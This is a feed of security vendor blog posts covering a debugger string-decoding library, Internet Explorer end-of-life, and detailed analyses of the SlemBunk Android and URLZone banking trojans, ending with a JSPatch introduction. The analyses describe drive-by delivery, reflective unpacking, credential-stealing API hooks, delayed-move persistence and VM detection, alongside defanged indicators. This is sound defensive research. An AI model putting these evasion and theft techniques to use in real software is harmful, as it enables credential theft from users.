Quantcast
Channel: Kristen Dennesen – Security Bloggers Network
Viewing all 138 articles
Browse latest View live

FLARE Script Series: Automating Obfuscated String Decoding

$
0
0
Introduction

We are expanding our script series beyond IDA Pro. This post extends the FireEye Labs Advanced Reverse Engineering (FLARE) script series to an invaluable tool for the reverse engineer – the debugger. Just like IDA Pro, debuggers have scripting interfaces. For example, OllyDbg uses an asm-like scripting language, the Immunity debugger contains a Python interface, and Windbg has its own language. Each of these options isn’t ideal for rapidly creating string decoding debugger scripts. Both Immunity and OllyDbg only support 32-bit applications, and Windbg’s scripting language is specific to Windbg and, therefore, not as well-known. The pykd project was created to interface between Python and Windbg to allow debugger scripts to be written in Python. Because malware reverse engineers love Python, we built our debugger scripting library on top of pykd for Windbg.

Here we release a library we call flare-dbg. This library provides several utility classes and functions to rapidly develop scripts to automate debugging tasks within Windbg. Stay tuned for future blog posts that will describe additional uses for debugger scripts!

String Decoding

Malware authors like to hide the intent of their software by obfuscating their strings. Quickly deobfuscating strings allows you to quickly figure out what the malware is doing.

As stated in Practical Malware Analysis, there are generally two approaches to deobfuscating strings: self-decoding and manual programming. The self-decoding approach allows the malware to decode its own strings. Manual programming requires the reverse engineer to reprogram the decoding function logic. A subset of the self-decoding approach is emulation, where each assembly instruction execution is emulated. Unfortunately, library call emulation is required, and emulating every library call is difficult and may cause inaccurate results. In contrast, a debugger is attached to the actual running process, so all the library functions can be run without issue. Each of these approaches has their place, but this post teaches a way to use debugger scripting to automatically self-decode all obfuscated strings.

Challenge

To decode all obfsucated strings, we need to find the following: the string decoder function, each time it is called, and all arguments to each of those instances. We then need to run the function and read out the result. The challenge is to do this in a semi-automated way.

Approach

The first task is to find the string decoder function and get a basic understanding of the inputs and outputs of the function. The next task is to identify each time the string decoder function is called and all of the arguments to each call. Without using IDA, a handy Python project for binary analysis is Vivisect. Vivisect contains several heuristics for identifying functions and cross-references. Additionally, Vivisect can emulate and disassemble a series of opcodes, which can help us identify function arguments. If you haven’t already, be sure to check out the FLARE scripting series post on tracking function arguments using emulation, which also uses Vivisect.

Introducing flare-dbg

The FLARE team is introducing a Python project, flare-dbg that runs on top of pykd. Its goal is to make Windbg scripting easy. The heart of the flare-dbg project lies in the DebugUtils class, which contains several functions to handle:

·      Memory and register manipulation
·      Stack operations
·      Debugger execution
·      Breakpoints
·      Function calling

In addition to the basic debugger utility functions, the DebugUtils class uses Vivisect to handle the binary analysis portion.

Example

I wrote a simple piece of malware that hides strings by encoding them. Figure 1 shows an HTTP User-Agent string being decoded by a function I named string_decoder.

Figure 1: String decoder function reference in IDA Pro

After a cursory look at the string_decoder function, the arguments are identified as an offset to an encoded string of bytes, an output address, and a length. The function can be described as the following C prototype:

Now that we have a basic understanding of the string_decoder function, we test decoding using Windbg and flare-dbg. We begin by starting the process with Windbg and executing until the program’s entry point. Next, we start a Python interactive shell within Windbg using pykd and import flaredbg.

Next, we create a DebugUtils object, which contains the functions we need to control the debugger.

We then allocate 0x3A-bytes of memory for the output string. We use the newly allocated memory as the second parameter and setup the remainder of the arguments.

Finally, we call the string_decoder function at virtual address 0x401000, and read the output string buffer.

After proving we can decode a string with flare-dbg, let’s automate all calls to the string_decoder function. An example debugger script is shown in Figure 2. The full script is available in the examples directory in the github repository.

Figure 2. Example basic debugger script

Let’s break this script down. First, we identify the function virtual address of the string decoder function and create a DebugUtils object. Next, we use the DebugUtils function get_call_list to find the three push arguments for each time string_decoder is called.

Once the call_list is generated, we iterate all calling addresses and associated arguments. In this example, the output string is decoded to the stack. Because we are only executing the string decoder function and won’t have the same stack setup as the malware, we must allocate memory for the output string. We use the third parameter, the length, to specify the size of the memory allocation. Once we allocate memory for the output string, we set the newly allocated memory address as the second parameter to receive the output bytes.

Finally, we run the string_decoder function by using the DebugUtils call function and read the result from our allocated buffer. The call function sets up the stack, sets any specified register values, and executes the function. Once all strings are decoded, the final step is to get these strings back into our IDB. The utils script contains utility functions to create IDA Python scripts. In this case, we output an IDA Python script that creates comments in the IDB.

Running this debugger script produces the following output:

The output IDA Python script creates repeatable comments on all encoded string locations, as shown in Figure 3.

Figure 3. Decoded string as comment

Conclusion

Stay tuned for another debugger scripting series post that will focus on plugins! For now, head over to the flare-dbg github project page to get started. The project requires pykd,winappdbg, and vivisect.


End of Life for Internet Explorer 8, 9 and 10

$
0
0

Microsoft has started the year with an announcement that, effective Jan. 12, 2016, support for all older versions of Internet Explorer (IE) will come to an end (known as an EoL, or End of Life). The affected versions are Internet Explorer 7, 8, 9, and 10.

What this means for users is that Microsoft will no longer release new security updates for these product versions going forward. This gives users two options: Internet Explorer 11 and Microsoft Edge, the latter of which is currently exclusive to Windows 10. If users would like to keep their browsers up to date, they will need to upgrade to either of these two options.

It should go without saying that Internet Explorer users are strongly encouraged to update to the latest version. It offers improved security with the latest security features and mitigations. Two notable mitigations introduced to the browser in 2014 are Isolated Heap and Memory Protect, which were implemented on Patch Tuesday of June and July 2014 respectively. Prior to that, Microsoft made a similar announcement about the Windows XP Operating System, wherein they issued an End of Life for XP in April 2014.

These are all steps in right direction for the Microsoft teams because it allows for the consolidation of team efforts, resulting in a stronger focus on securing fewer versions across a smaller code base. Microsoft continues to silently enhance protections as the months go by while at the same time trimming code.

Figure 1 shows the vulnerability counts for Internet Explorer versions in 2015.

Figure 1. Internet Explorer vulnerability count for 2015 [1]

The graph above shows the total number of reported vulnerabilities affecting each version of Internet Explorer across the months of 2015. Keeping in mind that these are non-unique counts, we can observe that, for the most part, the majority of the reported vulnerabilities affected Internet Explorer 11.

Figure 2 shows the most notable in the wild (ITW) attacks exploiting Internet Explorer in 2014 and 2015.

Year

CVE

Affects

2014

CVE-2014-0322

IE 9 and 10

2014

CVE-2014-1776

IE 6 to 11

2015

CVE-2015-2419

IE 10 and 11

2015

CVE-2015-2502

IE 7 to 11

Figure 2. ITW attacks of Internet Explorer [1]

The majority of the attacks found ITW in 2014 and 2015 affected IE 11.

Figure 3 compares the count of vulnerabilities that affect Internet Explorer 11 (IE 11) to the ones that don’t.

Figure 3. IE11 vs. Non-IE11 vulnerability count [1]

Based on the information found in Figures 1, 2, and 3, most of the vulnerabilities reported in 2015 affected Internet Explorer 11. This shows that attackers, as well as researchers, are focusing considerably on Internet Explorer 11. Microsoft’s most recent move will allow the company to do the same.

It should be noted that, as of Internet Explorer 11, some features are no longer supported or are considered deprecated. These include, but are not limited to, VML and VBScript, which have been used to exploit and compromise the integrity of Internet Explorer, or leveraged to bypass ASLR/DEP in the past. This is a strong move in the right direction, as trimming the code base leads to shrinking the attack surface. This helps secure products such as Internet Explorer.

It is also worth noting that at this point no ITW attacks have been observed against Microsoft Edge, the new web browser that currently ships exclusively with Windows 10. Microsoft Edge also follows the same approach of removing unnecessary features such as ActiveX and Browser Helper Objects, as well as others.

In conclusion, after Jan. 12, 2016, older Internet Explorer users will be exposed to vulnerabilities that may be exploited by malware and targeted by Exploit Kits. The best way to defend against this is to keep your browser up to date by upgrading to Internet Explorer 11 or using Microsoft Edge.

[1] Microsoft Security Bulletins: https://technet.microsoft.com/en-us/library/security/dn610807.aspx

The Dangers of Downloads: Securing Mobile Devices in 2016

$
0
0

In 2015, mobile malware attacks were on the rise; from 2014 to 2015 we saw an increase of 61% in the number of these attacks.

Malware has a clear progression path; it starts out targeting unsuspecting users who are likely to open unknown attachments or install unknown applications. The primary target? The user’s information. Think of the early Trojans that used infected machines for DDOS attacks or spam. Then the malware writers start to go after the users’ finances, identity and bank transfers. Finally, the malware morphs into targeted attacks at enterprise resources.

Mobile malware follows the same path. Early on, attackers used malicious apps to send premium SMS messages, racking up huge wireless bills for the unwary user, or getting them to install unwanted applications. Then the malware writers started to target the users’ bank credentials.

The recent SlemBunk attack is just the latest of these types of attacks. We also saw attacks in 2015 that targeted Android and increasingly iOS users, including the iOS XCode Ghost and the iBackdoor attack.

These mobile malware examples prove that you need a complete mobile security solution for 2016. Using an Enterprise Mobility Management (EMM) platform, like the one offered by AirWatch in conjunction with the FireEye MTP solution, is necessary to secure your mobile infrastructure.


Join us for a free webinar!

FireEye and AirWatch team up to discuss the latest mobile risks on Android
and iOS, and how you can protect your organization and employees.
Thurs, Jan. 28, 2016 (2 p.m. ET/11 a.m. PT)


SlemBunk Part II: Prolonged Attack Chain and Better-Organized Campaign

$
0
0
Introduction

Our follow-up investigation of a nasty Android banking malware we identified at the tail end of last year has not only revealed that the trojan is more persistent than we initially realized – thus making for a much more dangerous threat – but that it is also being used as part of an ongoing and evolving campaign.

On Wednesday, Dec. 17, 2015, FireEye published SlemBunk: An Evolving Android Trojan Family Targeting Users of Worldwide Banking Apps. The blog exposed SlemBunk – a family of Android trojan apps that attempt to steal the login credentials of mobile banking users. Those trojan apps masquerade as common, popular applications and stay incognito after running for the first time. They have the ability to phish for and harvest authentication credentials when specified banking apps are launched. In our initial investigation, we identified more than 170 SlemBunk samples that targeted users of 33 mobile banking apps, whose service regions cover three major continents: North America, Europe, and Asia Pacific.

The previous article described the technical details of SlemBunk, covering how it is composed, how it steals user credentials, and how it communicates with the command and control (CnC) server to conduct a variety of supporting functions. We also noted that drive-by downloads from porn sites were one distribution mechanism for the SlemBunk payload.

After releasing those findings, we continued to monitor the development of SlemBunk and conducted a more in-depth study. Our investigation identified a much longer attack chain (as depicted in Figure 1) than we reported in the previous article. Before the invocation of the actual SlemBunk payload, up to three apps have to land on the device in order to fire the last deadly shot. This makes it much harder for analysts to trace the observed attacks back to their actual origin, and thus the malware can have a more persistent existence on the victim’s device.

Figure 1. Prolonged attack chain of latest SlemBunk development

In this follow-up post, we present the technical details of this prolonged attack chain:

  • A drive-by download starts the prolonged attack chain and puts the first app onto the victim’s device. We call this app the SlemBunk dropper.
  • The dropper optionally uses a packer to hide its own payload, and thus runtime unpacking is needed to recover the second app: the SlemBunk downloader, which conducts in-app downloading to grab the actual malicious payload.
  • The downloader app queries a customized CnC server for the SlemBunk payload, the final app in the attack chain, and this app fires the last shot. The details of how the SlemBunk payload works is described in our previous blog.

Our additional research also identified the URLs of a few CnC servers for this campaign. We looked into the communication protocol between the SlemBunk apps and the CnC server by studying relevant code and monitoring the exchanged messages. It reveals that SlemBunk is developing into a more organized campaign with highly customized CnC servers, including the use of what appears to be an administration panel to manage the campaigns. The registration records of the relevant domains suggest that this campaign activity is very recent, still ongoing, and possibly evolving into different forms. In this follow-up article, we present our analysis into this data as well.

Drive-by Download: to Fetch SlemBunk Dropper

Early SlemBunk samples mainly distributed themselves by imitating popular apps, such as porn apps or essential tools. Drive-by downloads, however, can make it easier to reach more victims. The dropper app is the first app that lands on the victim’s device and the dropper app starts the prolonged attack chain that we will present in this article.

Figure 2 shows an example website that provides porn content, as seen from the content hosted on the webpage. However, the website also serves additional hidden content. When a user accesses the website, a script embedded in the page first detects the device type that is accessing the site. If it is an Android device, and the version of Android is greater than 2 and less than 6.4 (as seen in the JavaScript code inside the lower box), the apkDownload function will be called. After the app is downloaded, the website also prompts its users to “Please Update Flash on Your Device” (as seen in pop-up window and also the JavaScript code in the upper box). Unwary users, who are more eager to see the video than to consider what this app is really about, would readily accept what the website is saying, and happily install the app that claims to be a Flash update. However, malware lands on the victim’s device instead.

Figure 2. Porn site supports drive-by download of SlemBunk dropper

Usually, the app landing on the victim’s device is only a dropper for the actual malicious SlemBunk payload. By itself, the dropper can’t do much to compromise the user. To fire the last deadly shot, it has to go through a few other steps to achieve its surreptitious purpose. The next sections detail how the malicious payload finally lands on the victim’s device and enables theft of their banking credentials.

SlemBunk Dropper: to Unpack the SlemBunk Downloader

The downloader is the second app in the attack chain. Its main goal is to download the actual SlemBunk payload, which will be used to steal banking credentials from victims. However, the downloading logic is not very easy to identify. When looking into the dropper app downloaded from the above porn site, we found that there is only one class, named “Application,” inside the app’s code. The app is intentionally obfuscated because there are only a few Android API calls identified, most of which are Android’s reflection API calls used for dynamically loaded code. Figure 3 shows a snippet of the code to be invoked when the dropper is started.

Figure 3. Code to recover the in-app downloading logic

Line 3 shows that the only class in the dropper app extends an Android framework class named "android[.]app[.]Application". The reason for this extension is so that any classes extending this Android API will be started before any other components of this app. Also, the overwritten method attachBaseContext will be executed when an application is newly created. The SlemBunk dropper uses this trick to recover the in-app downloading logic.

The original in-app downloading logic is encoded into a 9-kilobyte Unicode string (in line 13). The code from lines 14 to 41 will decode this Unicode string, and write this code into a new app file, whose path is "/data/data/app_name/dex/new[.]apk". Runtime instrumentation shows that the content of variable v3 after the while loop (lines 19 to 26) will be the content of this apk file. The reflective write call will write the content of v3 into the particular path at line 42. The reflective method calls (from lines 29 to 39) are all file-relevant operations used to prepare for the writing operation at line 42. Table 1 shows the strings as encoded in the original code and as recovered at runtime.

Position

Original string (classes/methods/parameters)

Actual string for reflective classes, methods & parameters

Line 29

Class: ⴌ?질ꅁ㑝戡뿫唙ቄᥣ豰芒머ㆳ

java.lang.String

Line 30

Class: ⴌ?질ꅁ㑘戯뾫唸ቻᥲ

java.io.File

Lines 32-34

Class:ⴇ짚ꅒॏ㑘戤뾫唝?ቹᥣ豧芕먢ㇺ䗩䶠楅됳꺿쥐

Method: ⴁ짊ꅤ

Parameter: ⴂ

android.content.Context

 

getDir

 

dex

Line 36

Parameter: ⴈ짉ꄎ㑁戫

new.apk

Line 38

Class:ⴌ?질ꅁ㑘戯뾫唸ቻᥲ豍芎먢ㆤ䗟?楸됳꺨쥍?ጢ

java.io.FileOutputStream

Line 41

Method: ⴑ짗ꅔ

write

Table 1. Reflective method calls to decrypt the in-app downloading logic

After replacing the actual readable strings into these reflective calls, it is easy to see that the logic here is to write the content of v3 (the decoded in-app downloading logic) into the file, whose path is "/data/data/app_name/dex/new[.]apk".

In the same way, we decrypted the logic of the code shown in Figure 4, which finishes the task of the SlemBunk dropper. This part of the code uses the loadDex method of class "dalvik[.]system[.]DexFile" to dynamically load the newly generated app, delete it from storage, and then call into its entry point.

Figure 4. Dropper code snippet to load the downloader and transfer control

At this point, the packer has recovered the in-app downloading logic and called into its entry point. The next section will present our analysis of how the in-app downloading works.

SlemBunk Downloader: to Grab the Malicious SlemBunk Payload

The first two apps, although important, do not perform any of the intended malicious actions. Instead, they mainly serve as conduits that deliver the final malicious payload. They also help attackers to achieve a stealthier and more persistent existence on the device. First, a longer attack chain makes it much harder for an analyst to trace back the origin of the malicious actions. Second, the SlemBunk downloader, as shown in last section, will be deleted from storage after it is loaded, and thus will only exist in memory. Third, even if the malicious action of the SlemBunk payload were detected and removed, the more surreptitious downloader could periodically attempt to re-download the payload to the device. This section details how this downloader works.

The downloader, when invoked, first performs a device check to see if the payload is already installed and running. If not, the downloader starts a thread talking to a remote HTTP server that customizes how the payload is to be distributed. The remote server is hardcoded in the source code, as shown in line 14 in Figure 5.

Figure 5. The main thread of SlemBunk downloader (from an un-obfuscated sample)

To grab the SlemBunk payload, the downloader first tries to start the mobile network (at line 20) and wireless network (at line 26). At line 28, it calls Tools.JSON with the hard-coded URL as a parameter to start the downloading. The code in lines 34 to 42 tries to install the downloaded payload. The code at line 44 starts the newly downloaded app. The code at line 45 sends an answering message back to the server. And the code at line 46 deletes the app from storage.

Figure 6 shows the code snippet used to attempt downloading the app. First, the CnC server is contacted to get a response (at line 19), which is a JSON object. From the code, we can see that there are three parameters, as returned by the CnC server. The first one is a path for the actual place to download the SlemBunk payload (at line 22), the second is the package name for the downloaded app (at line 21), and the third parameter is the md5sum of the payload (at line 5). Interestingly, we found that the downloader incorporates a simple but effective mechanism to ensure that the correct payload is downloaded. From lines 24 to 27, it keeps attempting the downloading action until the MD5 value of the downloaded app is the same as the last parameter returned from the CnC server.

Figure 6. Communication details with the CnC server

Using a browser to access the hard-coded URL confirmed our findings. Figure 7 is a screenshot that shows an example of the returned JSON string. As shown in the red boxes, the three keys are “path”, “package” and “md5sum”, which are exactly the same as shown in lines 15 to 17 in Figure 6. The values for these keys further confirm our analysis. The first parameter gives the path to download the payload: "xxxvideotube[.]org/AdobeFlashPlayerUpdate". The second parameter is the package name of the downloaded app: “org.slempo.service”. And the third parameter is the md5sum for this app: “288AD03CC9788C0855D446E34C7284EA”.

Figure 7. The response from the CnC server

Better-Organized Campaign?

The use of a drive-by download to distribute the SlemBunk payload and the details of the CnC server communication suggest that this campaign is well-organized and continuing to evolve. As we continued our investigation, we found other interesting facts that support this assessment. First, the administrative interface hosted on the CnC server (described below) implies that the CnC server is customizable and that the SlemBunk payload can easily adapt per the attacker’s specifications. Second, the timeline information for the domains associated with this attack showed that this campaign is very recent, still ongoing, and very likely to continue evolving into different forms. We will keep a close eye on its development.

High Customizability

Line 14 in Figure 5 shows the CnC server and the query string that the SlemBunk downloader uses to determine the payload to download. Opening the CnC server in a web browser brings us to the login page shown in Figure 8. The title of this page shows “app-setuper-admin – login page”. The text on the page, when translated into English from the original Russian, reads “authorization,” “login,” and “password.” We believe this is the administrative interface for the attacker to customize how the CnC server should feed the payload to the downloader clients. It seems that the attackers are trying to develop this into a more organized campaign. The JSON object, as returned by the CnC server (as shown in Figure 7), also strengthens this theory.

Figure 8. App setup admin UI to customize the CnC configuration

Timeline of the Drive-by Downloading Campaign

We identified three domains directly related to this drive-by downloading campaign. Domain “xxxvideotube,” registered on Aug. 28, 2015, is used to host the SlemBunk dropper and payloads. Domain “brutaltube4mobile,” registered on Nov. 22, 2015, acts as the CnC server to host the payload configuration query and also the admin panel.

Figure 9. A new CnC domain found in one SlemBunk dropper

Among the latest samples we collected, we found a domain named “f8gr8e8tg[.]com” that replaces “brutaltube4mobile” as the CnC server (as shown in Figure 9). However, this domain seems to be dormant right now, and the corresponding app also reported failure when we attempted to start the app on the device. The domain registration records show that this domain was registered on Dec. 1, 2015.

Putting the registration records of these three domains together (Figure 10), we might be able to deduce a kind of developing relationship. When the first domain, "xxxvideotube[.]org," was created on Aug. 27, 2015 (four months ago), it might have been used only for the SlemBunk payload. The SlemBunk payload app hosted at "xxxvideotube[.]org/AdobeFlashPlayerUpdate[.]apk" has no dependency on the CnC server (the second domain in Figure 10). When the second domain (the CnC server) was set up on Nov. 22, 2015 (one month ago), the SlemBunk dropper app hosted at "xxxvideotube[.]org/AdobeUpdate[.]apk" was able to use this new CnC server to download the customized payload. The last domain seems to be a new attempt from the attacker. For some reason, it is not functioning well. In summary, we believe that this campaign activity is very recent, still ongoing, and possibly evolving into different forms.

Figure 10. Registration records for SlemBunk domains

Finally, the domain “brutaltube4mobile[.]com” was registered using the email address oodookree[@]gexmails[.]com. That email address was also used to register four other domains “brutalmobiletube[.com],” “brutalmobiletubes[.]com,” “adobeupdate,[.]org” and “australiamms[.]com”. Our initial study showed that the domain “australiamms[.]com” is used to host a CnC server for SlemBunk campaign. The domains “adobeupdate[.]org” and “brutalmobiletube[.]com” are dedicated for another malware campaign, which will be analyzed in detail in another upcoming blog. At this time we are not sure if there is a malicious purpose for the domain “brutalmobiletubes.[”]com".

Conclusion

SlemBunk is an evolving family of Android trojans that target mobile banking app users throughout the world. In this article, we presented the prolonged attack chain that we identified in its latest development, and the data to show that this campaign is a very recent, still ongoing effort that might develop into different forms. The FireEye mobile research team will keep a close eye on this.

URLZone Zones in on Japan

$
0
0

Recently we’ve seen an interesting trend from several crimeware families that were mainly active in the European region, and have now expanded their activity to Japan. Rovnix is one such family, as recently reported by IBM X-Force.

At the same time, we’ve seen another spam campaign break out in Japan. The malware attempted to deliver another old banking trojan named URLZone (aka Shiotob/Bebloh), which was initially discovered in 2009. URLZone is known to be very active in the European region, especially Spain and Germany. Now we have noticed that the spam group is focusing on Japan.

This blog describes a URLZone spam campaign targeting Japan in December 2015. We discuss its new persistence and evasion techniques, as well as its well-known password stealing method and command and control (CnC) communication.

Spam Campaign

On Dec. 16, 2015, and Dec. 21, 2015, we saw an extensive amount of URLZone spam emails being delivered to Japanese email users. Figure 1 represents the spikes of URLZone spam activity we detected during that time.

Figure 1. Timeline of URLZone activities

URLZone spam campaigns usually take place by targeting a specific region. The spam emails are crafted with the target region’s language, and are often sent using email account domains belonging to the target region. This increases the chance of recipients opening the malicious attachment, especially in non-English speaking regions, as the recipients are more familiar in exchanging emails in their native language.

The email subject and content were simple and generic. The subjects were written in English and Japanese with short Japanese sentences for the body, as shown in Figure 2.

Figure 2. URLZone spam email samples

Most of the spam emails were sent from freely available web email accounts in Japan. The majority of the emails used the domains softbank.jp and yahoo.co.jp, which are the largest mobile carrier and web portal service in Japan respectively.

An attached ZIP archive containing URLZone binaries was given two extension names in order to disguise it as a DOC or JPG file and trick recipients into opening the malicious attachment. For example “scan01_doc_2015~jpeg.zip” extracts “scan01_doc_2015~jpeg.jpeg.exe”.

Malware Analysis

URLZone is a banking trojan. It downloads a configuration file that contains information on targeted financial institutions, and uses web injection techniques to steal a user’s banking credentials. While the basic characteristics of URLZone samples in the campaign in Japan remained the same as the previous analysis done by Arbor Networks, several new features were added to the latest URLZone sample.

Initial Infection Stage

The malware uses process hollowing (also known as process replacement) to mask its execution. The malware tries to hollow explorer.exe or iexplorer.exe with a “_section” as added command-line parameter to identify this process as spawned by the malware.

The process it hollows is initially started as suspended. It then modifies or writes its malicious code to the entry point of the hollowed process. Once the necessary code is written, it will resume the suspended process, thus executing its malicious payload.

Next, the malware does one of the following:

1.     Continues to run the malicious routine in this hollowed process if the hollowed process is 64-bit or it has a window (this is for hollowed iexplore.exe).

2.     Continues the malicious routine by injecting itself into the running explorer.exe on the system.

Stolen Information

System Survey

To identify the victim system, the malware acquires the following details:

-        Computer name

-        OS major/minor version, as well as install date

-        Hollowed process name version and time stamp

-        IP address

-        Keyboard layout

This is sent out in a beacon POST to the CnC server as described in Arbor’s report.

Email Addresses

URLZone steals the email addresses stored in the Windows Address Book (WAB). It does so by querying both wab32.dll and WAB file name in the registry. It then uses this library to parse through the WAB file and save the information to a randomly generated value in a randomly generated key /SOFTWARE/<random>/<random_value>.

Web/FTP/Email Information and Credentials

The malware steals web and FTP information by injecting malicious code into commonly used programs for connectivity. It injects a specific malicious routine on each target program that hooks a certain library used to send or receive network traffic. A continuous thread is running that constantly checks for the presence of these applications, and concurrently injects a certain hooking function dependent of the process name. The hooking process is described in depth here.

-        iexplore.exe – WinInet hooking

-        explorer.exe – WinInet hooking

-        myie.exe – WinInet hooking

-        firefox.exe. – WinInet hooking

-        ftpte.exe – WinSock hooking

-        coreftp.exe - WinSock hooking

-        filezilla.exe - WinSock hooking

-        TOTALCMD.EXE - WinSock hooking

-        cftp.exe - WinSock hooking

-        FTPVoyager.exe - WinSock hooking

-        SmartFTP.exe - WinSock hooking

-        WinSCP.exe - WinSock hooking

-        chrome.exe – WinInet hooking

-        opera.exe – WinInet hooking

For FTP/Email applications (that do WinSock hooking), it hooks 3 APIs from ws2_32.dll:

-        ws2_32_send

-        ws2_32_connect

-        ws2_32_close

It monitors FTP/MAIL transactions through ws2_32_connect by checking for the string “FTP” and “MAIL” on the connect parameters. The FTP/MAIL server address and connection handle is stolen from this hook. The ws2_32_send hook captures the authentication request by checking the strings “USER” and “PASS” to steal the user’s credentials.

For Web applications that use WinInet, it consists of API hooks used for monitoring HTTP/S sessions using the hooks shown in the appendix.

These hooks look for strings as specified in the malware’s configuration file, and these strings target the data from financial institutions. If a match is found, the malware sends out the information to its CnC server.

Command and Control

URLZone uses a Domain Generation Algorithm (DGA), as stated in other reports. The initial CnC URL starts of as a hard-coded encrypted string within the malware body. If the hard-coded URL doesn’t work, the malware then uses DGA to find the right one.

The malware checks for Internet connectivity by first connecting to google.com. It then proceeds to check, through SSLv3 handshake, whether the generated URL responds to its certificate. It continuously does this until a valid URL is found.

The DGA takes in the previous URL as a seed to generate other domains.

Persistence Mechanism

Unlike many other banking trojans, URLZone uses a clever persistence mechanism and clears its registry configuration only upon logoff, reboot, and shutdown.

It does this using a Window Procedure that monitors Window Messages for WM_QUERYENDSESSION

Figure 3 shows a subroutine of the Windows Procedure.

The persistence mechanism and registry clearing is done using the following method:

1.     Malware creates a copy of itself unto %ProgramFiles% for Windows XP and %AppData% for Windows Vista and up with a randomly generated filename from a given list of strings. We’ll call this %dropfilepath%.

2.     It registers a Window Procedure to monitor the window messages.

3.     The Window Procedure checks the Windows Messages coming in the system and waits for a Window Message WM_QUERYENDSESSION to execute its routine, as describe below in Figure 3.

Figure 3. Monitoring system shutdowns

If the Window Procedure catches a WM_QUERYENDSESSION Window message it performs the following actions:

a.    Delete the random registry key HKLM/SOFTWARE/<random>, which contains the stolen email addresses and interprocess configuration of injected routines.

b.    Create Startup registry on SoftwareMicrosoftWindowsCurrentVersionRun and write its corresponding registry value in either one of these methods:

                        i.     Generate shortcut file (LNK file) pointing to %dropfilepath% and append “-autorun” to generated lnk file.
                        ii.     If %dropfilepath% doesn’t exist, continue to write a registry value with a –autorun parameter.

·       Generate a random 20 character string with file extension .txt, and concatenate it with the folder of %dropfilepath% and name this as %txtfilepath%. Write a copy of the malware binary to %txtfilepath%, which is found on the running malware’s process heap or memory. Call MoveFileExA with the DELAY_UNTIL_REBOOT flag to copy the contents from %txtfilepath% to %dropfilepath%.  Specifying the DELAY_UNTIL_REBOOT flag, the binary delays this file’s move operation until the system reboots. This is likely done to prevent security software from being suspicious. Figure 4 shows the corresponding MoveFileExA API call.

Figure 4. Delayed MoveFileExA API call to prevent antivirus detection

Random Filename Generation

URLZone uses an interesting algorithm to generate random filenames. Unlike most banking trojans, which generate random looking strings for dropped filenames, URLZone uses an array of strings to generate the filename of the dropped file. To add entropy to the random string generation algorithm, it uses a subroutine that creates a random byte using the RDTSC instruction combined with other arithmetic operations.

The array of strings used to generate the filename is as follows:

char *filenames[] = ["win", "video", "def", "mem", "dns",  "user", "logon", "hlp", "mixer", "pack", "mon", "srv", "exec", "play"]

The random string generation algorithm can be invoked in two ways:

1.     rand(len_min, len_max, upper_offset_limit) -> to construct a random string from a given string.
2.     rand(upper_offset_limit) -> to get a random string from a given array.

len_min and len_max are the minimum and maximum lengths of the string to be returned. The upper_offset_limit is the upper limit of the offset, which is generated randomly.

The above algorithms are used to generate the filename as follows:

1.     Get a string randomly from the above array.
2.     Construct a random string of length between 1 and 2 from the string: "qwertyuiopasdfghjklzxcvbnm123945678"
3.     Calculate a flag randomly and check its value. If the value of the flag is 0, then it proceeds to concatenate the strings generated in step 1 and 2. If the value of flag is 1, then it gets one more string randomly from the array similar to step 1.

By putting all this together, we have the following two ways filenames can be generated based on the value of the random flag:

1.     If flag is 0, then concatenate strings in steps 1 and 2.
2.     If flag is 1, then concatenate strings in steps 1, 2, and 3.

The reason for generating the filenames this way may be to evade heuristics of security products, which alert on dropped executable files with randomly generated names. The filename generated using the above algorithm looks human readable and less suspicious.

Evasion Technique

URLZone attempts to detect the use of VMware using the following method:

1.     Resolve SetupDi APIs by pre-calculated string hash from setupapi.dll
2.     Retrieve the device information using those APIs
3.     Check if the device names acquired contain the string “vm”

Figure 5. VMware sandbox detection

As shown in Figure 5, the malware partially collects two characters from “SoftwareMicrosoftWindowsCurrentVersionRun” string to build up “vm” for comparison. SetupDi API enumerates all the names of the devices installed in the system, such as “vmware”, “svga ii”.

As soon as one of the device names starts with the string “vm” it will jump to a hooking function and soon terminates the thread, thus not allowing the malware to continue further with is routine and CnC callback.

An Ongoing Campaign

On Jan. 19, 2016, and Jan. 20, 2016, we observed another round of URLZone spam targeting Japan. The basic TTPs are unchanged, but the scale is larger than the spam campaign we observed in December 2015.

Conclusion

Although URLZone has been around for a while and primarily targets countries in Europe, we still see it active and now shifting to Japan. It is likely that URLZone will further expand its activity in Japan with improved localization and techniques. Email users should be cautious about viewing emails coming from unknown senders.

Appendix

URLZone sample hashes

·       15896a44319d18f8486561b078146c30a0ce1cd7e6038f6d614324a39dfc6c28
·       884fccbbfa5a5b96d2e308856b996ee20d9656d04505fb3cdf926270f5d11c28

Hooked APIs

·       WinInet.HttpEndRequestA
·       WinInet.HttpEndRequestW
·       WinInet.HttpOpenRequestA
·       WinInet.HttpOpenRequestW
·       WinInet.HttpQueryInfoA
·       WinInet.HttpQueryInfoW
·       WinInet.HttpSendRequestA
·       WinInet.HttpSendRequestExW
·       WinInet.HttpSendRequestW
·       WinInet.InternetCloseHandle
·       WinInet.InternetQueryDataAvailable
·       WinInet.InternetReadFile
·       WinInet.InternetReadFileExA
·       WinInet.InternetReadFileExW
·       WinInet.InternetWriteFile
·       nspr.PR_Read
·       nspr.PR_Write
·       nspr.PR_Close
·       ws2_32.send
·       ws2_32.connect
·       ws2_32.closesocket

 

Hot or Not? The Benefits and Risks of iOS Remote Hot Patching

$
0
0

Introduction

Apple has made a significant effort to build and maintain a healthy and clean app ecosystem. The essential contributing component to this status quo is the App Store, which is protected by a thorough vetting process that scrutinizes all submitted applications. While the process is intended to protect iOS users and ensure apps meet Apple’s standards for security and integrity, developers who have experienced the process would agree that it can be difficult and time consuming. The same process then must be followed when publishing a new release or issuing a patched version of an existing app, which can be extremely frustrating when a developer wants to patch a severe bug or security vulnerability impacting existing app users.

The developer community has been searching for alternatives, and with some success. A set of solutions now offer a more efficient iOS app deployment experience, giving app developers the ability to update their code as they see fit and deploy patches to users’ devices immediately. While these technologies provide a more autonomous development experience, they do not meet the same security standards that Apple has attempted to maintain. Worse, these methods might be the Achilles heel to the walled garden of Apple’s App Store.

In this series of articles, FireEye mobile security researchers examine the security risks of iOS apps that employ these alternate solutions for hot patching, and seek to prevent unintended security compromises in the iOS app ecosystem.

As the first installment of this series, we look into an open source solution: JSPatch.

Episode 1. JSPatch

JSPatch is an open source project – built on top of Apple’s JavaScriptCore framework – with the goal of providing an alternative to Apple’s arduous and unpredictable review process in situations where the timely delivery of hot fixes for severe bugs is vital. In the author’s own words (bold added for emphasis):

JSPatch bridges Objective-C and JavaScript using the Objective-C runtime. You can call any Objective-C class and method in JavaScript by just including a small engine. That makes the APP obtaining the power of script language: add modules or replacing Objective-C code to fix bugs dynamically.

